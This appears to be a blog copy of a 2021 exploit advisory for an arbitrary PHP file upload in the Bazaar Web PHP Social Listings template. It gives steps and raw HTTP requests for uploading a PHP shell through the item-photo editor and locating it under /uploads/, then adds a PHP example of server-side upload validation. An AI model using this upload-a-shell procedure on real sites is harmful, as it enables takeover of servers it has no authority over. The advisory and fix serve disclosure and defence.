Monday, December 20, 2021

Bazaar Web PHP Social Listings Shell Upload

<--

# Exploit Title: Bazaar Web PHP Social Listings Arbitrary File Upload
# Google Dork: N/A
# Date: 19/12/2021
# Exploit Author: Sohel Yousef - [email protected]
# Software Link: https://codecanyon.net/item/bazaar-social-listing-shopping-web-php-template/23207913
# Software Demo :https://xserver.app/__apps/bazaar-web/index.php#
# Category: webapps

1. Description

The Bazaar Web PHP Social Listings script contains an arbitrary file upload
vulnerability: a registered user can upload .php files in the "Edit an item"
section without any security checks.

List item link:

localhost/bazaar-web/list-item-info.php

Edit the item photos and upload a PHP file, then use inspect element to find
the path of the uploaded file.

Uploaded file path:

localhost/bazaar/uploads/yourfile.php

Right-click the photo and use inspect element to see the path.



Host: (HOST)
Accept: */*
Accept-Language: ar,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate, br
X-Requested-With: XMLHttpRequest
Content-Type: multipart/form-data; boundary=---------------------------47450779111254302601850437199
Content-Length: 63132
Connection: keep-alive
Referer: https:/localhost/bazaar-web/list-item-info.php?itemID=uT8aeJcTu5
Cookie: AWSALB=BOOAELkwd/6yNqpv36ou/NXmOgXJcpsfK+qMH36RZwhotfk/zd8hoyDpbc2Qt4nwl1mw8CBJm0bJTwoci7kY6kAfwutcXuxjFCKoSPXqis2mMnE1ab8qwGquZOYI; AWSALBCORS=BOOAELkwd/6yNqpv36ou/NXmOgXJcpsfK+qMH36RZwhotfk/zd8hoyDpbc2Qt4nwl1mw8CBJm0bJTwoci7kY6kAfwutcXuxjFCKoSPXqis2mMnE1ab8qwGquZOYI; PHPSESSID=o0it0cquadspsgh864fr4mvtrt
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin

file=fx.php&fileName=fx.php

GET https://localhost/bazaar/uploads/pZ2CGSkezbiDprchqpZ7_fx.php
Host: HOST
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
Accept: image/avif,image/webp,*/*
Accept-Language: ar,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://localhost/bazaar-web/list-item-info.php?itemID=uT8aeJcTu5
Cookie: AWSALB=Zl/BPrqEgbVqCknGhgr3fTBKhe+vxhq2WkKOn6NZEvstF659/bY85gK5a9rehQC9ejX8mXIhp/F5HoMd7iiNXUs0PKBGysX6kGrjeS2ZnnmHHfe6wwZNqWYQbbRx; AWSALBCORS=Zl/BPrqEgbVqCknGhgr3fTBKhe+vxhq2WkKOn6NZEvstF659/bY85gK5a9rehQC9ejX8mXIhp/F5HoMd7iiNXUs0PKBGysX6kGrjeS2ZnnmHHfe6wwZNqWYQbbRx; PHPSESSID=o0it0cquadspsgh864fr4mvtrt
Sec-Fetch-Dest: image
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin









#####

-->
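
One way to validate the item-photo upload on the server, as an added example (not code from the Bazaar product or from the advisory author): it ignores the client-supplied file name and assigns the extension from the detected image type. The field name `file` is taken from the request above; `UPLOAD_DIR`, `MAX_BYTES` and `store_item_photo` are hypothetical names.

```php
<?php
declare(strict_types=1);
// Added example, not Bazaar's code. Assumptions: the multipart field is named
// "file" (as in the request above); UPLOAD_DIR and MAX_BYTES are hypothetical.
const UPLOAD_DIR = __DIR__ . '/uploads';
const MAX_BYTES  = 5 * 1024 * 1024;
const ALLOWED    = [   // detected MIME type => extension the server assigns
    'image/jpeg' => 'jpg',
    'image/png'  => 'png',
    'image/webp' => 'webp',
];

function store_item_photo(array $upload): string
{
    if (($upload['error'] ?? UPLOAD_ERR_NO_FILE) !== UPLOAD_ERR_OK) {
        throw new RuntimeException('upload failed');
    }
    $tmp = $upload['tmp_name'];
    if (!is_uploaded_file($tmp) || filesize($tmp) > MAX_BYTES) {
        throw new RuntimeException('invalid or oversized upload');
    }
    // Decide the type from the file's bytes, never from the client-supplied
    // name or Content-Type (the advisory's request carried fileName=fx.php).
    $mime = (new finfo(FILEINFO_MIME_TYPE))->file($tmp);
    $ext  = is_string($mime) ? (ALLOWED[$mime] ?? null) : null;
    if ($ext === null) {
        throw new RuntimeException('only JPEG, PNG or WebP images are accepted');
    }
    // Also require that the header parses as an image. This rejects mislabeled
    // files; the main defence remains the server-assigned extension below.
    if (@getimagesize($tmp) === false) {
        throw new RuntimeException('not a valid image');
    }
    // Server-generated name: nothing from the client reaches the stored path.
    $name = bin2hex(random_bytes(16)) . '.' . $ext;
    if (!move_uploaded_file($tmp, UPLOAD_DIR . '/' . $name)) {
        throw new RuntimeException('could not store file');
    }
    return $name;
}

if (($_SERVER['REQUEST_METHOD'] ?? '') === 'POST' && isset($_FILES['file'])) {
    // Session and item-ownership checks are assumed to run before this point.
    try {
        echo json_encode(['stored' => store_item_photo($_FILES['file'])]);
    } catch (RuntimeException $e) {
        http_response_code(400);
        echo json_encode(['error' => $e->getMessage()]);
    }
}
```

Pair this with a web-server rule that disables script execution in the upload directory, so that anything stored there is only ever served as static content.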
 
